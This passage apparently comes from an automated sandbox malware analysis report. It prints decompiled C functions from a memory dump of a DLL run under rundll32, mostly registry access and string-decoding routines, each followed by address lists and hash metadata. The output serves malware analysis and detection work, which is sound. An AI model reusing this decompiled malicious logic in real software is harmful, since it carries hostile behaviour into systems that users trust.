				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4c3d27c; // 0xa6a5a8
				_t4 = _t15 + 0x4c3e39c; // 0x56a8944
				_t20 = _t4;
				_t6 = _t15 + 0x4c3e124; // 0x650047
				_t17 = E04C39152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04C39FC9(_t17, _t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                    0x04c39322
                                                                                                                                                                                                                                    0x04c39324
                                                                                                                                                                                                                                    0x04c3932b
                                                                                                                                                                                                                                    0x04c3932c
                                                                                                                                                                                                                                    0x04c3932d
                                                                                                                                                                                                                                    0x04c3932e
                                                                                                                                                                                                                                    0x04c39334
                                                                                                                                                                                                                                    0x04c39339
                                                                                                                                                                                                                                    0x04c39339
                                                                                                                                                                                                                                    0x04c39343
                                                                                                                                                                                                                                    0x04c39355
                                                                                                                                                                                                                                    0x04c3935c
                                                                                                                                                                                                                                    0x04c3938b
                                                                                                                                                                                                                                    0x04c3935e
                                                                                                                                                                                                                                    0x04c39363
                                                                                                                                                                                                                                    0x04c39388
                                                                                                                                                                                                                                    0x04c39365
                                                                                                                                                                                                                                    0x04c39368
                                                                                                                                                                                                                                    0x04c3936f
                                                                                                                                                                                                                                    0x04c3937a
                                                                                                                                                                                                                                    0x04c39371
                                                                                                                                                                                                                                    0x04c39374
                                                                                                                                                                                                                                    0x04c39374
                                                                                                                                                                                                                                    0x04c3937e
                                                                                                                                                                                                                                    0x04c3937e
                                                                                                                                                                                                                                    0x04c39363
                                                                                                                                                                                                                                    0x04c39392

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6c0702a08201dfc5adfeac0b53abf58eac175d4cb3ece1e7fae7184504bfd717
                                                                                                                                                                                                                                    • Instruction ID: f02f383c46fbd209967a8477116a149af61e2f6e2828978713b2e31af3f2585f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c0702a08201dfc5adfeac0b53abf58eac175d4cb3ece1e7fae7184504bfd717
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7901B1B2504019BFDF50AFA8CC449AEBBBAFB48741F004825F911E20B0E3B0ED5497D1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C389D6, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 41%
                                                                                                                                                                                                                                    			E04C389D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				char _v12;
				void* _t15;
				void* _t20;
				void* _t23;
				signed short* _t24;

				_t23 = E04C3809F(0, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E04C3904E(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						__imp__( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f;
						_t20 = E04C3A635(__edx, 8, _a4, 0x80000001, _a8, _t23);
					}
					__imp__( *0x4c3d238, 0, _t23);
				}
				return _t20;
			}








                                                                                                                                                                                                                                    0x04c389e9
                                                                                                                                                                                                                                    0x04c389ed
                                                                                                                                                                                                                                    0x04c38a47
                                                                                                                                                                                                                                    0x04c389ef
                                                                                                                                                                                                                                    0x04c389f6
                                                                                                                                                                                                                                    0x04c389fc
                                                                                                                                                                                                                                    0x04c38a00
                                                                                                                                                                                                                                    0x04c38a05
                                                                                                                                                                                                                                    0x04c38a09
                                                                                                                                                                                                                                    0x04c38a0f
                                                                                                                                                                                                                                    0x04c38a18
                                                                                                                                                                                                                                    0x04c38a1d
                                                                                                                                                                                                                                    0x04c38a32
                                                                                                                                                                                                                                    0x04c38a32
                                                                                                                                                                                                                                    0x04c38a3d
                                                                                                                                                                                                                                    0x04c38a3d
                                                                                                                                                                                                                                    0x04c38a4e

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5d7fae165b6b0adbe2f3ce27130d252ec3531c1eff55408526b43cc5ceb4a8b9
                                                                                                                                                                                                                                    • Instruction ID: 9fafc8439d229939063a0de7711171885ae4dcd76c1b6a62937cd933363ad593
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d7fae165b6b0adbe2f3ce27130d252ec3531c1eff55408526b43cc5ceb4a8b9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1018F36200209BBEF216FA4DC44F9A7BBAFF84309F004425FA009A150EBB6E9649760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C31262, Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E04C31262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
				signed short _t18;
				intOrPtr _t23;
				signed int _t25;
				signed short _t26;

				if(_a4 != 0) {
					_t18 = E04C39318(_a4, _a8, _a12, __esi); // executed
					_t26 = _t18;
				} else {
					_t26 = E04C36BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t25 = _a8 >> 1;
						if(_t25 == 0) {
							_t26 = 2;
							__imp__( *0x4c3d238, 0, _a12);
						} else {
							_t23 = _a12;
							 *(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26;
							 *__esi = _t23;
						}
					}
				}
				return _t26;
			}







                                                                                                                                                                                                                                    0x04c3126a
                                                                                                                                                                                                                                    0x04c312bf
                                                                                                                                                                                                                                    0x04c312c4
                                                                                                                                                                                                                                    0x04c3126c
                                                                                                                                                                                                                                    0x04c31286
                                                                                                                                                                                                                                    0x04c3128a
                                                                                                                                                                                                                                    0x04c3128f
                                                                                                                                                                                                                                    0x04c31291
                                                                                                                                                                                                                                    0x04c312a1
                                                                                                                                                                                                                                    0x04c312ad
                                                                                                                                                                                                                                    0x04c31293
                                                                                                                                                                                                                                    0x04c31293
                                                                                                                                                                                                                                    0x04c31296
                                                                                                                                                                                                                                    0x04c3129b
                                                                                                                                                                                                                                    0x04c3129b
                                                                                                                                                                                                                                    0x04c31291
                                                                                                                                                                                                                                    0x04c3128a
                                                                                                                                                                                                                                    0x04c312ca

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 881150ed841d8acb28686bf5f8f38b52e2981c94c655aca85a21731b77a46e46
                                                                                                                                                                                                                                    • Instruction ID: 75498ca21332d178e5999bbf3c4f21a91460ee22c9c728d1fbd7f3fafc9ce762
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 881150ed841d8acb28686bf5f8f38b52e2981c94c655aca85a21731b77a46e46
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58011236100249FFDB11DF44CC01FBE3BB6EB44352F188429FA159A160DB71E521DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C354BC, Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C354BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__; // 0x76d24a00
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04C32049(_t10 + 1, _t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04C39039(_t15, _t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                    0x04c354c1
                                                                                                                                                                                                                                    0x04c354cc
                                                                                                                                                                                                                                    0x04c354ce
                                                                                                                                                                                                                                    0x04c354d4
                                                                                                                                                                                                                                    0x04c354d6
                                                                                                                                                                                                                                    0x04c354db
                                                                                                                                                                                                                                    0x04c354e4
                                                                                                                                                                                                                                    0x04c354e8
                                                                                                                                                                                                                                    0x04c354f1
                                                                                                                                                                                                                                    0x04c354f5
                                                                                                                                                                                                                                    0x04c35504
                                                                                                                                                                                                                                    0x04c354f7
                                                                                                                                                                                                                                    0x04c354f8
                                                                                                                                                                                                                                    0x04c354fd
                                                                                                                                                                                                                                    0x04c354fd
                                                                                                                                                                                                                                    0x04c354f5
                                                                                                                                                                                                                                    0x04c354e8
                                                                                                                                                                                                                                    0x04c3550d

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0f67e6f018ab3a278427149f84df2e24a0e84f9545442a4bf3980e4140bd63f8
                                                                                                                                                                                                                                    • Instruction ID: 02cc1767ceabe43bbaf4506522e15683f0bbcb82dbe63b1938873c3e60093a16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f67e6f018ab3a278427149f84df2e24a0e84f9545442a4bf3980e4140bd63f8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF05E76600149BAEB11D6AA9C40EEF76AFDBC5656F150069A905E3140EA70FF019770
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C396A4, Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C396A4(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t10;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;

				_t10 =  *0x4c3d270; // 0xd448b889
				_v8 = _t10;
				_v12 = _t10;
				_t23 = 0; // executed
				_t12 = E04C321CD(__ecx,  &_v12); // executed
				if(_t12 != 0) {
					_t14 =  *0x4c3d27c; // 0xa6a5a8
					_t4 = _t14 + 0x4c3e796; // 0x74666f53
					_t17 = E04C37A9A(_t4, 0);
					 *0x4c3d33c = _t17;
					if(_t17 != 0) {
						_t18 =  *0x4c3d27c; // 0xa6a5a8
						_v8 = _v8 ^ 0x738bb12a;
						_t8 = _t18 + 0x4c3e862; // 0x61636f4c
						_t21 = E04C37A9A(_t8, 1);
						 *0x4c3d344 = _t21;
						if(_t21 != 0) {
							_t23 = 1;
						}
					}
				}
				return _t23;
			}












                                                                                                                                                                                                                                    0x04c396aa
                                                                                                                                                                                                                                    0x04c396b0
                                                                                                                                                                                                                                    0x04c396b3
                                                                                                                                                                                                                                    0x04c396ba
                                                                                                                                                                                                                                    0x04c396bc
                                                                                                                                                                                                                                    0x04c396c3
                                                                                                                                                                                                                                    0x04c396c5
                                                                                                                                                                                                                                    0x04c396ca
                                                                                                                                                                                                                                    0x04c396d5
                                                                                                                                                                                                                                    0x04c396dc
                                                                                                                                                                                                                                    0x04c396e1
                                                                                                                                                                                                                                    0x04c396e3
                                                                                                                                                                                                                                    0x04c396e8
                                                                                                                                                                                                                                    0x04c396ef
                                                                                                                                                                                                                                    0x04c396fb
                                                                                                                                                                                                                                    0x04c39702
                                                                                                                                                                                                                                    0x04c39707
                                                                                                                                                                                                                                    0x04c39709
                                                                                                                                                                                                                                    0x04c39709
                                                                                                                                                                                                                                    0x04c39707
                                                                                                                                                                                                                                    0x04c396e1
                                                                                                                                                                                                                                    0x04c3970e

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction ID: bd832aa519261c40106d56889c55850736870fd094121f86b0608dc765d69e43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0139f5e893da6a3698cb801f0e05ac8cd21df386c8cd501b836a8f4ce4a5b10e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F04FB9911119ABDB20DFB8D9849DE77FDEB09306F108063E502D7240E6B4EF04DB90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C32436, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E04C32436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;

				_t22 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				_t19 = __imp__; // 0x76d26490
				while(1) {
					_v16 = _t15;
					 *_t19(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}









                                                                                                                                                                                                                                    0x04c32436
                                                                                                                                                                                                                                    0x04c32443
                                                                                                                                                                                                                                    0x04c32444
                                                                                                                                                                                                                                    0x04c32445
                                                                                                                                                                                                                                    0x04c3244c
                                                                                                                                                                                                                                    0x04c32452
                                                                                                                                                                                                                                    0x04c3247a
                                                                                                                                                                                                                                    0x04c3247b
                                                                                                                                                                                                                                    0x04c3247e
                                                                                                                                                                                                                                    0x04c32484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32463
                                                                                                                                                                                                                                    0x04c3246d
                                                                                                                                                                                                                                    0x04c32474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32465
                                                                                                                                                                                                                                    0x04c32468
                                                                                                                                                                                                                                    0x04c32488
                                                                                                                                                                                                                                    0x04c3246a
                                                                                                                                                                                                                                    0x04c3246a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3246a
                                                                                                                                                                                                                                    0x04c32468
                                                                                                                                                                                                                                    0x04c3248f
                                                                                                                                                                                                                                    0x04c32495
                                                                                                                                                                                                                                    0x04c32495
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction ID: c077cb2e74d004b45afec248507e157982e599a806eeea00d2a37484c3300cee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f5bbc44f7c3d190012440b25a522ee525d29ab43d2b05e1fe32100347f173de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF04975D01219EFDF00DB98D488AEDB7B8EF04306F1480EAE502A7201E3B56B84CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C324E1, Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E04C324E1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t14;
				void* _t16;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v12 = _a16;
				_t14 =  *0x4c3d27c; // 0xa6a5a8
				_t5 = _t14 + 0x4c3e10c; // 0x56a86b4
				_t7 = _t14 + 0x4c3e2a4; // 0x650053
				_v20 = 3;
				_t16 = E04C39152(_t5, _a4, 0x80000001, _a8, _t7, _a12, _t5,  &_v20); // executed
				return _t16;
			}








                                                                                                                                                                                                                                    0x04c324ed
                                                                                                                                                                                                                                    0x04c324ee
                                                                                                                                                                                                                                    0x04c324ef
                                                                                                                                                                                                                                    0x04c324f0
                                                                                                                                                                                                                                    0x04c324f5
                                                                                                                                                                                                                                    0x04c324fc
                                                                                                                                                                                                                                    0x04c32501
                                                                                                                                                                                                                                    0x04c3250b
                                                                                                                                                                                                                                    0x04c32515
                                                                                                                                                                                                                                    0x04c32523
                                                                                                                                                                                                                                    0x04c3252a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction ID: 36fc8b55db0c4b338c47358043cb50035e8671347f461f19c7e448ff76c177b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0eab493905bee29f00d26a6b8b9e3130b31e3f367543f284f1fffeea5421bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01C76400109BEDF01DFA8C844CEAB7B9FB08304F018525FA05A6121E771EA159B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C38055, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					__imp__(0x4c3d23c);
					if(_t4 == 0) {
						E04C3970F();
					}
				} else {
					_t7 = _t4 - 1;
					if(_t7 == 0) {
						__imp__(0x4c3d23c);
						if(_t7 == 1) {
							_t8 = E04C36A56(_t7, _t9, _t10, _v0); // executed
							if(_t8 != 0) {
								_t12 = 0;
							}
						}
					}
				}
				return _t12;
			}










                                                                                                                                                                                                                                    0x04c3805c
                                                                                                                                                                                                                                    0x04c3805d
                                                                                                                                                                                                                                    0x04c38060
                                                                                                                                                                                                                                    0x04c3808a
                                                                                                                                                                                                                                    0x04c38092
                                                                                                                                                                                                                                    0x04c38094
                                                                                                                                                                                                                                    0x04c38094
                                                                                                                                                                                                                                    0x04c38062
                                                                                                                                                                                                                                    0x04c38062
                                                                                                                                                                                                                                    0x04c38063
                                                                                                                                                                                                                                    0x04c3806a
                                                                                                                                                                                                                                    0x04c38072
                                                                                                                                                                                                                                    0x04c38078
                                                                                                                                                                                                                                    0x04c3807f
                                                                                                                                                                                                                                    0x04c38081
                                                                                                                                                                                                                                    0x04c38081
                                                                                                                                                                                                                                    0x04c3807f
                                                                                                                                                                                                                                    0x04c38072
                                                                                                                                                                                                                                    0x04c38063
                                                                                                                                                                                                                                    0x04c3809c

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f42a001c4a39909645b9edc32546d021d1fdf6ef9813f6d4bd8ddd292230c587
                                                                                                                                                                                                                                    • Instruction ID: 4a04ccb88ba5bda2151f7304943a8210bcb27564e2d8e12b66644726c4474a96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f42a001c4a39909645b9edc32546d021d1fdf6ef9813f6d4bd8ddd292230c587
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE0867A3442215797357FB49844B6EA6D3AF01B87F054424F6C5D4070D660FD509EF1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3904E, Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v8;
				void* _t13;

				_v8 = 1;
				if(_a4 == 0) {
					return E04C36B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
				}
				_t13 = E04C324E1(_a4, _a8, _a12, 1); // executed
				return _t13;
			}





                                                                                                                                                                                                                                    0x04c39059
                                                                                                                                                                                                                                    0x04c3905c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c39082
                                                                                                                                                                                                                                    0x04c39068
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                                                                                                                                                                                                    • Instruction ID: 28cf19cd797aa6c8156ff40d48a3eca7cf2260302c3701e8bbd86ec869088f2a
